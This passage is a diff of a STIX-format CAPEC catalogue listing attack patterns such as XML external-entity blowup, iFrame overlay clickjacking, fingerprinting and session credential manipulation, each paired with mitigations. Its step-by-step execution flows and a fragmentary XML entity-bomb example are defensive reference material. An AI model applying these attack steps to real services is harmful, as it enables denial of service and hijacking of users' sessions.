"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5b53a383-dcc4-4eb9-a9b9-4b7b9cfc1401", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--040e99bd-3494-432d-a072-6400fc8f9043", + "spec_version": "2.1", + "target_ref": "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Utilize digital signatures to increase authentication assurance.", + "id": "course-of-action--03a878aa-814d-4ec7-8981-4019491f098a", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-22-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c8ac652e-3dc2-4676-8383-373e67124466", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--03a878aa-814d-4ec7-8981-4019491f098a", + "spec_version": "2.1", + "target_ref": "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Utilize two factor authentication to increase authentication assurance.", + "id": "course-of-action--4cfdedd8-f75c-4aa9-8e79-a60fe00a2f6b", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-22-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--bef5f4f9-1fce-4a46-b4fb-7c23116a91fc", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4cfdedd8-f75c-4aa9-8e79-a60fe00a2f6b", + "spec_version": "2.1", + "target_ref": "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1f8b75f6-daad-4ca8-b8eb-fba33ce31e5c", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b", + "spec_version": "2.1", + "target_ref": "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary takes advantage of weaknesses in the protocol by which a client and server are communicating to perform unexpected actions. Communication protocols are necessary to transfer messages between client and server applications. Moreover, different protocols may be used for different types of interactions.", + "external_references": [ + { + "external_id": "CAPEC-220", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/220.html" + }, + { + "external_id": "CWE-757", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/757.html" + } + ], + "id": "attack-pattern--9c983530-1927-43ca-addd-63d149cda4a7", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Client-Server Protocol Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2166d3c5-baec-4f42-8284-c1b5b649ad34" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_extended_description": "\n For example, an authentication protocol might be used to establish the identities of the server and client while a separate messaging protocol might be used to exchange data. If there is a weakness in a protocol used by the client and server, an attacker might take advantage of this to perform various types of attacks. For example, if the attacker is able to manipulate an authentication protocol, the attacker may be able spoof other clients or servers. If the attacker is able to manipulate a messaging protocol, the may be able to read sensitive information or modify message contents. This attack is often made easier by the fact that many clients and servers support multiple protocols to perform similar roles. For example, a server might support several different authentication protocols in order to support a wide range of clients, including legacy clients. Some of the older protocols may have vulnerabilities that allow an attacker to manipulate client-server interactions.\n ", + "x_capec_parent_of_refs": [ + "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "attack-pattern--ae3f2c33-9018-442e-9cc3-24d65c7f4974", + "attack-pattern--13d1d169-0023-41e2-952f-7d794844733b", + "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "attack-pattern--7b462c1f-e0bf-41a7-b811-2b676c103bda" + ], + "x_capec_prerequisites": [ + "The client and/or server must utilize a protocol that has a weakness allowing manipulation of the interaction." + ], + "x_capec_resources_required": [ + "The adversary must be able to identify the weakness in the utilized protocol and exploit it. This may require a sniffing tool as well as packet creation abilities. The adversary will be aided if they can force the client and/or server to utilize a specific protocol known to contain exploitable weaknesses." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack takes advantage of the entity replacement property of certain data serialization languages (e.g., XML, YAML, etc.) where the value of the replacement is a URI. A well-crafted file could have the entity refer to a URI that consumes a large amount of resources to create a denial of service condition. This can cause the system to either freeze, crash, or execute arbitrary code depending on the URI.", + "external_references": [ + { + "external_id": "CAPEC-221", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/221.html" + }, + { + "external_id": "CWE-611", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/611.html" + }, + { + "description": "XML External Entities", + "external_id": "43", + "source_name": "WASC", + "url": "http://projects.webappsec.org/XML-External-Entities" + } + ], + "id": "attack-pattern--ee525a27-de33-45e9-ba7f-f63562001a5b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Data Serialization External Entities Blowup", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--247019da-353e-4910-9d11-7dc6c0421a17", + "attack-pattern--b6f5248a-346f-484f-8091-8ab84288aa81" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software", + "Software" + ], + "x_capec_example_instances": [ + "\n In this example, the XML parser parses the attacker's XML and opens the malicious URI where the attacker controls the server and writes a massive amount of data to the response stream. In this example the malicious URI is a large file transfer.\n < !DOCTYPE bomb []>&detonate;\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find target web service: The adversary must first find a web service that takes input data in the form of a serialized language such as XML or YAML.

Experiment

  1. Host malicious file on a server: The adversary will create a web server that contains a malicious file. This file will be extremely large, so that if a web service were to try to load it, the service would most likely hang.

  2. Craft malicious data: Using the serialization language that the web service takes as input, the adversary will craft data that links to the malicious file using an external entity reference to the URL of the file.

Exploit

  1. Send serialized data containing URI: The adversary will send specially crafted serialized data to the web service. When the web service loads the input, it will attempt to download the malicious file. Depending on the amount of memory the web service has, this could either crash the service or cause it to hang, resulting in a Denial of Service attack.

", + "x_capec_prerequisites": [ + "A server that has an implementation that accepts entities containing URI values." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack may be mitigated by tweaking the XML parser to not resolve external entities. If external entities are needed, then implement a custom XmlResolver that has a request timeout, data retrieval limit, and restrict resources it can retrieve locally.", + "id": "course-of-action--f88600ce-ddcc-4bc8-a94c-55d673aaa78d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-221-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--56e07d24-a92d-4fa8-813a-42ce29f65724", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f88600ce-ddcc-4bc8-a94c-55d673aaa78d", + "spec_version": "2.1", + "target_ref": "attack-pattern--ee525a27-de33-45e9-ba7f-f63562001a5b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack may be mitigated by tweaking the serialized data parser to not resolve external entities. If external entities are needed, then implement a custom resolver that has a request timeout, data retrieval limit, and restrict resources it can retrieve locally.", + "id": "course-of-action--1d15fec6-8b70-44d9-b58a-5c9aebb8153b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-221-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7d30d657-82b7-41fb-8963-2316f86a288e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1d15fec6-8b70-44d9-b58a-5c9aebb8153b", + "spec_version": "2.1", + "target_ref": "attack-pattern--ee525a27-de33-45e9-ba7f-f63562001a5b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In an iFrame overlay attack the victim is tricked into unknowingly initiating some action in one system while interacting with the UI from seemingly completely different system.", + "external_references": [ + { + "external_id": "CAPEC-222", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/222.html" + }, + { + "external_id": "CWE-1021", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1021.html" + }, + { + "description": "Michal Zalewski, Browser Security Handbook, 2008, Google Inc.", + "external_id": "REF-84", + "source_name": "reference_from_CAPEC", + "url": "https://code.google.com/archive/p/browsersec/wikis/Main.wiki" + }, + { + "description": "M. Mahemoff, Explaining the \"Don't Click\" Clickjacking Tweetbomb, 2009--02---12, Software As She's Developed", + "external_id": "REF-85", + "source_name": "reference_from_CAPEC", + "url": "http://softwareas.com/explaining-the-dont-click-clickjacking-tweetbomb" + } + ], + "id": "attack-pattern--b9593e93-5589-4ae9-b0e7-09fa5c3136e5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "iFrame Overlay", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ec41b2b3-a3b6-4af0-be65-69e82907dfef" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "The following example is a real-world iFrame overlay attack [2]. In this attack, the malicious page embeds Twitter.com on a transparent IFRAME. The status-message field is initialized with the URL of the malicious page itself. To provoke the click, which is necessary to publish the entry, the malicious page displays a button labeled \"Don't Click.\" This button is aligned with the invisible \"Update\" button of Twitter. Once the user performs the click, the status message (i.e., a link to the malicious page itself) is posted to their Twitter profile." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Craft an iFrame Overlay page: The adversary crafts a malicious iFrame overlay page.

    2. Techniques
    The adversary leverages iFrame overlay capabilities to craft a malicious iFrame overlay page.

Exploit

  1. adversary tricks victim to load the iFrame overlay page: adversary utilizes some form of temptation, misdirection or coercion to trick the victim to loading and interacting with the iFrame overlay page in a way that increases the chances that the victim will visit the malicious page.

    2. Techniques
    Trick the victim to the malicious site by sending the victim an e-mail with a URL to the site.
    Trick the victim to the malicious site by manipulating URLs on a site trusted by the victim.
    Trick the victim to the malicious site through a cross-site scripting attack.

  2. Trick victim into interacting with the iFrame overlay page in the desired manner: The adversary tricks the victim into clicking on the areas of the UI which contain the hidden action controls and thereby interacts with the target system maliciously with the victim's level of privilege.

    3. Techniques
    Hide action controls over very commonly used functionality.
    Hide action controls over very psychologically tempting content.
", + "x_capec_extended_description": "\n While being logged in to some target system, the victim visits the adversarys' malicious site which displays a UI that the victim wishes to interact with. In reality, the iFrame overlay page has a transparent layer above the visible UI with action controls that the adversary wishes the victim to execute. The victim clicks on buttons or other UI elements they see on the page which actually triggers the action controls in the transparent overlaying layer. Depending on what that action control is, the adversary may have just tricked the victim into executing some potentially privileged (and most undesired) functionality in the target system to which the victim is authenticated. The basic problem here is that there is a dichotomy between what the victim thinks they are clicking on versus what they are actually clicking on.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The victim is communicating with the target application via a web based UI and not a thick client. The victim's browser security policies allow iFrames. The victim uses a modern browser that supports UI elements like clickable buttons (i.e. not using an old text only browser). The victim has an active session with the target system. The target system's interaction window is open in the victim's browser and supports the ability for initiating sensitive actions on behalf of the user in the target system." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "High": "Crafting the proper malicious site and luring the victim to this site is not a trivial task." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Disable iFrames in the Web browser.", + "id": "course-of-action--da7d677a-ae6f-4b92-b6a4-578b18ac2096", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-222-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f004d2c5-c636-4b39-9be8-fbf612902dbb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--da7d677a-ae6f-4b92-b6a4-578b18ac2096", + "spec_version": "2.1", + "target_ref": "attack-pattern--b9593e93-5589-4ae9-b0e7-09fa5c3136e5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Operation: When maintaining an authenticated session with a privileged target system, do not use the same browser to navigate to unfamiliar sites to perform other activities. Finish working with the target system and logout first before proceeding to other tasks.", + "id": "course-of-action--0fd28b29-b808-4832-90eb-f5f753cb6353", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-222-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8ceb66f2-318c-41f7-9c7f-8411d9e9db00", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0fd28b29-b808-4832-90eb-f5f753cb6353", + "spec_version": "2.1", + "target_ref": "attack-pattern--b9593e93-5589-4ae9-b0e7-09fa5c3136e5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Operation: If using the Firefox browser, use the NoScript plug-in that will help forbid iFrames.", + "id": "course-of-action--37728b90-749a-4550-90b1-0befc14f3052", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-222-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--653bb15f-3973-4933-b573-881524838af8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--37728b90-749a-4550-90b1-0befc14f3052", + "spec_version": "2.1", + "target_ref": "attack-pattern--b9593e93-5589-4ae9-b0e7-09fa5c3136e5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary compares output from a target system to known indicators that uniquely identify specific details about the target. Most commonly, fingerprinting is done to determine operating system and application versions. Fingerprinting can be done passively as well as actively. Fingerprinting by itself is not usually detrimental to the target. However, the information gathered through fingerprinting often enables an adversary to discover existing weaknesses in the target.", + "external_references": [ + { + "external_id": "CAPEC-224", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/224.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Fingerprinting", + "external_id": "45", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Fingerprinting" + } + ], + "id": "attack-pattern--76e6fe1e-34f2-40cd-8f12-f4d4f9c41808", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Fingerprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617", + "attack-pattern--f40c59ce-f023-4e3e-937e-07fa2b7bc3ec", + "attack-pattern--e7eec058-4cd9-4fa0-8784-ed961d8d7290" + ], + "x_capec_prerequisites": [ + "A means by which to interact with the target system directly." + ], + "x_capec_resources_required": [ + "If on a network, the adversary needs a tool capable of viewing network communications at the packet level and with header information, like Mitmproxy, Wireshark, or Fiddler." + ], + "x_capec_skills_required": { + "Medium": "Some fingerprinting activity requires very specific knowledge of how different operating systems respond to various TCP/IP requests. Application fingerprinting can be as easy as envoking the application with the correct command line argument, or mouse clicking in the appropriate place on the screen." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "While some information is shared by systems automatically based on standards and protocols, remove potentially sensitive information that is not necessary for the application's functionality as much as possible.", + "id": "course-of-action--e117150b-4841-447b-aef4-8a9aa1d5ad94", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-224-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1eb63bf7-b7b2-4e41-9dfa-0544c490911b", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e117150b-4841-447b-aef4-8a9aa1d5ad94", + "spec_version": "2.1", + "target_ref": "attack-pattern--76e6fe1e-34f2-40cd-8f12-f4d4f9c41808", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker manipulates an existing credential in order to gain access to a target application. Session credentials allow users to identify themselves to a service after an initial authentication without needing to resend the authentication information (usually a username and password) with every message. An attacker may be able to manipulate a credential sniffed from an existing connection in order to gain access to a target server.", + "external_references": [ + { + "external_id": "CAPEC-226", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/226.html" + }, + { + "external_id": "CWE-565", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/565.html" + }, + { + "external_id": "CWE-472", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/472.html" + } + ], + "id": "attack-pattern--012db73f-2f3c-49f3-bdf3-12ec3eee01ce", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Session Credential Falsification through Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--414d0884-4f46-4a51-b4ea-72125c7f5f9e" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n For example, a credential in the form of a web cookie might have a field that indicates the access rights of a user. By manually tweaking this cookie, a user might be able to increase their access rights to the server. Alternately an attacker may be able to manipulate an existing credential to appear as a different user. This attack differs from falsification through prediction in that the user bases their modified credentials off existing credentials instead of using patterns detected in prior credentials to create a new credential that is accepted because it fits the pattern. As a result, an attacker may be able to impersonate other users or elevate their permissions to a targeted service.\n ", + "x_capec_prerequisites": [ + "The targeted application must use session credentials to identify legitimate users." + ], + "x_capec_resources_required": [ + "An attacker will need tools to sniff existing credentials (possibly their own) in order to retrieve a base credential for modification. They will need to understand how the components of the credential affect server behavior and how to manipulate this behavior by changing the credential. Finally, they will need tools to allow them to craft and transmit a modified credential." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary attempts to deny legitimate users access to a resource by continually engaging a specific resource in an attempt to keep the resource tied up as long as possible. The adversary's primary goal is not to crash or flood the target, which would alert defenders; rather it is to repeatedly perform actions or abuse algorithmic flaws such that a given resource is tied up and not available to a legitimate user. By carefully crafting a requests that keep the resource engaged through what is seemingly benign requests, legitimate users are limited or completely denied access to the resource.", + "external_references": [ + { + "external_id": "CAPEC-227", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/227.html" + }, + { + "external_id": "CWE-400", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/400.html" + }, + { + "description": "Endpoint Denial of Service", + "external_id": "T1499", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499" + }, + { + "description": "Denial of Service", + "external_id": "10", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Denial-of-Service" + } + ], + "id": "attack-pattern--6e3dda09-c1da-4f44-a0b3-e0e3b6fe0601", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Sustained Client Engagement", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n The degree to which the attack is successful depends upon the adversary's ability to sustain resource requests over time with a volume that exceeds the normal usage by legitimate users, as well as other mitigating circumstances such as the target's ability to shift load or acquire additional resources to deal with the depletion. This attack differs from a flooding attack as it is not entirely dependent upon large volumes of requests, and it differs from resource leak exposures which tend to exploit the surrounding environment needed for the resource to function. The key factor in a sustainment attack are the repeated requests that take longer to process than usual.\n ", + "x_capec_parent_of_refs": [ + "attack-pattern--aa92a904-ed9d-4dc3-a01f-c965521e9934" + ], + "x_capec_prerequisites": [ + "This pattern of attack requires a temporal aspect to the servicing of a given request. Success can be achieved if the adversary can make requests that collectively take more time to complete than legitimate user requests within the same time frame." + ], + "x_capec_resources_required": [ + "To successfully execute this pattern of attack, a script or program is often required that is capable of continually engaging the target and maintaining sustained usage of a specific resource. Depending on the configuration of the target, it may or may not be necessary to involve a network or cluster of objects all capable of making parallel requests." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Potential mitigations include requiring a unique login for each resource request, constraining local unprivileged access by disallowing simultaneous engagements of the resource, or limiting access to the resource to one access per IP address. In such scenarios, the adversary would have to increase engagements either by launching multiple sessions manually or programmatically to counter such defenses.", + "id": "course-of-action--ba77ea83-e6e2-4046-9e24-9a6bd2a3a947", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-227-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f425c6e4-a641-4d70-890a-e1583d4defe9", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba77ea83-e6e2-4046-9e24-9a6bd2a3a947", + "spec_version": "2.1", + "target_ref": "attack-pattern--6e3dda09-c1da-4f44-a0b3-e0e3b6fe0601", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker injects malicious content into an application's DTD in an attempt to produce a negative technical impact. DTDs are used to describe how XML documents are processed. Certain malformed DTDs (for example, those with excessive entity expansion as described in CAPEC 197) can cause the XML parsers that process the DTDs to consume excessive resources resulting in resource depletion.", + "external_references": [ + { + "external_id": "CAPEC-228", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/228.html" + }, + { + "external_id": "CWE-829", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/829.html" + }, + { + "description": "Ryan Naraine, DoS Flaw in SOAP DTD Parameter, InternetNews.com, 2003--12---15, ITBusiness Edge, Quinstreet Inc.", + "external_id": "REF-86", + "source_name": "reference_from_CAPEC", + "url": "http://www.internetnews.com/dev-news/article.php/3289191" + } + ], + "id": "attack-pattern--5cf3eacf-a0c6-4c59-9f97-4f677a90587a", + "modified": "2020-12-17T00:00:00.000Z", + "name": "DTD Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--8e3a14fd-870a-4286-866d-805107c7d922" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--f36abc8a-043e-42c5-876d-a65fc0cddc1e", + "attack-pattern--8f70b1fb-393f-4494-b4ad-67f1a2107975" + ], + "x_capec_child_of_refs": [ + "attack-pattern--aa6a831a-8eae-4690-b4a2-ff3e4d43a716" 